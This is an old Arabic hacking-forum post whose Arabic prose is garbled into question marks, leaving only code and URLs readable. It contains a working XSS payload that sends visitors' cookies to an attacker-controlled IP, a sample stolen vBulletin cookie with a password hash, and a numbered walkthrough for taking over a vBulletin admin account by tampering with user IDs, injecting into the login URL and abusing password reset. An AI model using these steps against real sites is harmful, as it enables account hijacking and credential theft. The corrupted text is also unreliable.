الشبح, General Administrator
Posts: 16 Points: 46 Rating: 0 Registration date: 21/05/2009 Age: 31
| Subject: Hacking forums: the ordinary vulnerability Thursday May 21, 2009 4:00 pm | |
| ??? ???? ?????? ?????? ?????? ????? ????? ???? ??????? ????? ??? ?? ???????? ? ???? ?????? ? ??? ??????? ??? ????? ???? ??? ???? ???? ???? ??? ????? ?????? ??? ???: ?????? ????? ????? ???? ??????? : ??? ??????? ????? ??? ??????? ????? ?????? ??? ??????? ?????? ????????? ?????? ???? ?? ?? ???????? ??? ????????? ?? ???? ???????? ? ????? ??????? ?? ????? ???? ????? ?? ????????? ?? ?????? ????? ? ???????
???? ?? ????? ????? : ??? ???? ?????? ?????? ---------- ?????? : ---------
????? ????? ????? ??? ??? ????? .. ???? ??? ????????? ??????? ???? ???? ??????? ???????? ??? ??? ??????? ?????? ?????? ?? ???? ????? .. ??? ????? ?? ???? ??????? ?????? ??? HTML ..
?? ?????? ????? ???? ?? ?? (?? ????? ???? ??? HTML ) .. ?? ???? ?? ????? ????? ??? ?????? ??? ????? : <script>document.write('<img src="http://my_ip_address/'+document.******************+'">';</script>
?? ?????? ???? ??? IP Address ??? ??? ??? IP ????? ?? .
?????? ???? ??? ?? ?????? ????? ?????? ??? ??????? ???? ???? ????? ????? ?????? ??????? ?? ???? ?????? ??? ?? ??? ????? ??????? ???? ????? ??? ???????? ?????? ???????? .. ?? ???? ??????? ?????? ??? ?????? ??? ??? ???? ?? ???? ???? ??????? ????? (?? ?????? ??? ??? ?? ???? ??? ????? ????? ??? IIS ?? Apache ?? ????? ) .
???? ?? ??? ??????? ????? ?? ???? ??? ??? Log ????? ???????? ???? ?????? ????? .. ???? ?? ??? ??????? ?????? .. ???? ?????? Apache ????? logs ????? Access Log . ???? ???? ??????? ???? ?????? ?? ??????? .. ???
???? ?? ????? ????? ????????? .. ???? :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvisit=1011983161
??? ????? ???? .. ??? ???????? ?? ???????? ?????? ??? ?????? ????? ???? ????? .. ??? ????? ? ?? ???? ????? ???? ????? ?????? ?? ??????? .. ???? ????? http://www.victim.com/vb/index.php?bbuseri...sword=[password hash] ???? ????? : " ???? ?????? ??? ( ??? ???? ???? ??? ???????....) " ?? ??? ?????? ??? ???? ?????? ?????? ??? ?? ????? ???? ??????? (???? ???? ??? ???????) .. ????? ????? ??? ???? ?????? ?????? ??? ???? ?????? .. ???? ??? (??????) ??? ?????? ?????? ?????????? ??? ????? ????? ??? ?? ?????? ?????? .. ?? ???? ??? ???? Forgot Password .. ?????? ?????? ??????? ???? ????? ?????? ?????? ..
????? ??? ???? ?? ??? ?? ????? ??? ??? !! ???? ??? ???? ?????? ????? ?? ???? .. !
------------ ???? -----------
??????? ?? ??? ?????? ?? ?????? ??? HTML ?? (??????? + ??????? ?????? + ???????? + ??????? + ... ) (??? ???? ???? ?? ????? ??? ??? HTML ??? ???? ???? )
??? ??? ???? ??? ??? IMG .. ???? ?????? ??????? ???????? ??? ???? <script> ???? ???? <img> ?? <Demon> ?? ?? ???? ???? ???? ???? ????? ??????? ???? ?? ???? ... ??? ?? ???? ????? ??? ??????? . Be Secret .. Don't be Lamer .
????? ?????? ?????? : 31 - 1 - 2002 ?? ??????? ??? ??????? 2.2.0 ??? ???? ????? .
???? ?? ???????? ??? ??????? ?? ????? ???? ????????? ?? ??????? ????? ?????????
====================================== ?????? ??????? VP ====================================== ?????? ????????? ?? ???????? vb
1. ?? ???????? ???? ?? ?????? ??????? ????? ?????
2. ???? ??????? ???? ???? ???????? ????? ???? ?????? ??
3. ???? ??? ?? ( ??????? ) ??????? ??????? ?? members .
?? ??????? ???????? ?????? : http://URL/memberlist.php
URL = ??????? ???????? ???????
??? = - .com
4. ???? ??? ?? ?????? ?? ?????????? ??????? ??????? ???? ????? ???? ??????? ?? ?????? ???????? address bar .
????? ?? ????? ???? ?????? ?????? ??????? ?????? ?????? :
http://URL/member.php?soitgoe68e45u...info&userid=266
??? ??????? ?????? ???? = ??? ?????? ???????? ??? 266
5. ??? ????? ??? ????? ?? 266 ??? ????? ???? ????
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
????? ??? ???? ???? ????????? ???? ?? ?????? ??????? administrator .
(((== ?? ??? ????? ?????? ?????? ????? ????? ?? ?? ?????? ?????? == ))
???? ??? ?????? ??? ??? ??????? ??????? ???????
6. ???? ??????? ?????? ?? ????? ?????????? ???? ??????? :
http://URL/member.php?action=login&...VALI...ame='ADMIN'').'
??????? ??? ????? ?????? ??????? ???????
URL = ??? ????? ????? ?????? ???????? ??????? VALIDUSER = ??? ???????? ????? ?? VALIDPASS = ???? ???? ?????? ?? YOUR@EMAIL.HERE = ?????? ???? ???? ?? ???????? ADMIN = ??? ???? ??????? ( ???? ??????? ??????? ??????? )
7. ??? ?? ????? ???? ?? ??? ?????? ??? ???? ???? ????? ??????? ??? ???? refresh .
8. ?? ???? ????? ??????? ???????? http://url/index.php
?? ???? ?????? ???????? ??? ???????? ????? ?? ???????? ???? ?? ????? ( ??? ?? ???? ????? ) .
?????? ????? ?? ?????? ??????? ???? ???? :
??? ??? ?????? ???? ?? ?????
you typed in the wrong password
9. ??? ????? ???? ???
???? ???? ???? forgot password
????? ????? ?????? ???? ???? ??? ????? ??????????
10. ???? ????? ????? ???? ???? ?????? ????? ???????
?????? ??? ??????? ????? ????? ????????? ????? ?????? ??? ?????? ???? ?? ?????? ????? ??? ?? ??????? ?????